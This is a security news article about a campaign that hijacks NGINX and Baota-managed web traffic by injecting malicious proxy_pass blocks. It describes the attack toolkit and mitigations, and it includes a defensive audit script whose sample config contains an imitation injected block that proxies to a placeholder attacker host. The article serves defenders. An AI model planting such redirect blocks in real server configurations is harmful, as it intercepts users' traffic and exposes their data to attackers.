Attackers are exploiting NGINX installations and Baota management panels to intercept and reroute web traffic through malicious infrastructure, targeting government, education, and Asian TLDs.

Cybersecurity researchers at Datadog Security Labs have uncovered an ongoing campaign where threat actors compromise NGINX web servers and Baota management panels to hijack legitimate web traffic. The attackers inject malicious configurations that silently redirect user requests through attacker-controlled infrastructure.
Attack Mechanism
The campaign leverages multiple shell scripts that modify NGINX configuration files to insert malicious location blocks. These blocks use the proxy_pass directive to intercept requests to specific URL paths and reroute them to domains operated by attackers. Security researcher Ryan Simon explained:
"The malicious configuration intercepts legitimate web traffic between users and websites and routes it through attacker-controlled backend servers. The campaign specifically targets Asian TLDs (.in, .id, .pe, .bd, .th), Chinese hosting infrastructure using Baota Panel, and government/education domains (.edu, .gov)."
Toolkit Breakdown
The multi-stage attack toolkit includes:
- zx.sh: Orchestrates payload execution via curl/wget or raw TCP connections
- bt.sh: Targets Baota Panel environments to overwrite NGINX configs
- 4zdh.sh: Scans for common NGINX configuration locations
- zdh.sh: Focuses on Linux/containerized NGINX instances with TLD targeting
- ok.sh: Generates reports on active hijacking rules
Mitigation Steps
NGINX administrators should:
- Audit configuration files for unauthorized proxy_pass directives
- Monitor for unexpected processes modifying /etc/nginx/ paths
- Restrict write access to NGINX configuration directories
- Implement NIST-recommended container security practices for containerized deployments
- Update Baota Panel installations to latest patched versions
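The injected location blocks described under "Attack Mechanism" are ordinary proxy_pass directives, so the first audit step above reduces to enumerating every proxy_pass target in the configuration tree and flagging any host that is not a known backend. The script below is an added example written for this article, not tooling from Datadog or from the campaign; it builds a small constructed NGINX config tree in a temporary directory (the backend.attacker.invalid host and the /wp-login.php path are made up for the demo) and then reports proxy_pass targets that are absent from a caller-supplied allowlist.

```shell
#!/bin/sh
# Added example (not part of the Datadog report): enumerate proxy_pass
# directives under an NGINX config directory and flag targets whose host is
# not on an allowlist of known backends. All hosts and paths are constructed.

# Build a constructed config tree in a temp dir so the example runs offline.
# The second location block imitates the kind of injected block the article
# describes; its hostname is a placeholder, not a real indicator.
make_demo_conf() {
    dir=$(mktemp -d)
    mkdir -p "$dir/conf.d"
    cat > "$dir/nginx.conf" <<'EOF'
http {
    include conf.d/*.conf;
}
EOF
    cat > "$dir/conf.d/site.conf" <<'EOF'
server {
    listen 80;
    server_name example.test;
    location /api/ {
        proxy_pass http://127.0.0.1:8080;   # legitimate local app
    }
    # Constructed stand-in for an injected block:
    location /wp-login.php {
        proxy_pass http://backend.attacker.invalid;
    }
}
EOF
    echo "$dir"
}

# Print "file:line host[:port]" for every uncommented proxy_pass directive
# in *.conf files under $1. A scheme-less target such as "$upstream" is
# printed as-is so that it still shows up for manual review.
list_proxy_pass() {
    grep -rn --include='*.conf' -E '^[[:space:]]*proxy_pass[[:space:]]+' "$1" \
    | sed -E 's#^([^:]+):([0-9]+):[[:space:]]*proxy_pass[[:space:]]+([a-z]+://)?([^/;[:space:]]+).*#\1:\2 \4#'
}

# Print only the entries whose host (port stripped) is not in the
# space-separated allowlist $2.
unexpected_proxy_pass() {
    list_proxy_pass "$1" | while read -r loc host; do
        bare=${host%%:*}
        case " $2 " in
            *" $bare "*) ;;              # known backend: skip
            *) echo "$loc $host" ;;      # anything else needs a look
        esac
    done
}

# Number of entries not on the allowlist, on stdout.
count_unexpected() {
    unexpected_proxy_pass "$1" "$2" | wc -l | tr -d ' '
}

# Demo run against the constructed tree. On a real host you would point the
# functions at /etc/nginx (or wherever 4zdh.sh-style scans would look).
demo=$(make_demo_conf)
echo "All proxy_pass targets:"
list_proxy_pass "$demo"
echo "Targets not on the allowlist:"
unexpected_proxy_pass "$demo" "127.0.0.1 localhost"
rm -rf "$demo"
```

Run it periodically from cron, or after any deploy, with an allowlist drawn from your inventory of legitimate upstreams; a non-empty "not on the allowlist" section is the signal to diff the file against version control. To cover the second mitigation step (catching the write itself rather than its result), pair it on Linux with an auditd file watch such as `auditctl -w /etc/nginx -p wa -k nginx_conf`, which logs every process that modifies the directory.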
Related Campaigns
This activity connects to broader exploitation patterns:
- React2Shell (CVE-2025-55182): 56% of exploitation attempts originate from two IP addresses (193.142.147[.]209, 87.121.84[.]24)
- Citrix ADC Reconnaissance: Parallel campaign using residential proxies to discover login panels
GreyNoise researchers noted:
"The dominant sources deploy distinct post-exploitation payloads: one retrieves cryptomining binaries from staging servers, while the other opens reverse shells directly to the scanner IP. This suggests interest in interactive access rather than automated resource extraction."
Organizations using NGINX should immediately review their web server configurations and implement strict change control procedures for critical infrastructure files.
